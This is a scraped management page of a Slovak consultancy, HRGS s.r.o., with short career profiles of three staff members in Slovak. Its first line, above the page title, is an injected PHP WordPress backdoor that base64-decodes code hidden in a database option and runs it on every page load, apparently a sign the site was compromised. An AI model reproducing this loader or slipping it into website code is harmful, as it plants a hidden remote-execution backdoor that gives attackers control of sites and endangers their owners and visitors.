add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. Management

Management

Miroslav Galousek

Pozícia: Senior manager Skúsenosti: 8 rokov

Miroslav Galousek pôsobil vo Všeobecnej úverovej banke, a.s., kde v rozsahu jeho riadiacich kompetencií riešil požiadavky širokej klientely banky v segmente retail a small business a súčasne úspešne riadil team viac ako 15 zamestnancov.V HRGS s.r.o. pôsobí Miroslav Galousek ako senior manager pre korporátnu klientelu s cieľom poskytovania ucelených služieb v oblasti financií, účtovníctva a obchodnej stránky podnikateľskej činnosti klientov.

Veronika Hetényiová

Pozícia: Senior lawyer Skúsenosti: 3 roky

Veronika Hetényiová je špecialistom v oblasti reštrukturalizačného práva, pričom právne vzdelanie získala na prestížnej Université de Genéve, Faculté de droit. Právne vedomosti a skúsenosti spolu s aktívnou komunikáciou v troch svetových jazykoch (anglický, nemecký, francúzsky), zabezpečuje plnohodnotné podnikateľské poradenstvo pri riešení problémov na úrovni Slovenskej republiky a krajín Európskej únie.

Marek Staš

Pozícia: Senior manager Skúsenosti: 18 rokov

V minulosti bol Marek Staš obchodným zástupcom vo významnej slovenskej spoločnosti, kde získal rozsiahle obchodné kontakty predovšetkým z Ruskej federácie a Poľska. Postavenie Mareka Staša v HRGS s.r.o. je vzhľadom na uvedené zamerané práve na zabezpečovanie posúdenia možností vstupu investora a následne aj vykonanie všetkých obchodných rokovaní nevyhnutných na úspešné zavŕšenie transakcie.

Scroll to Top
Prejsť na panel nástrojov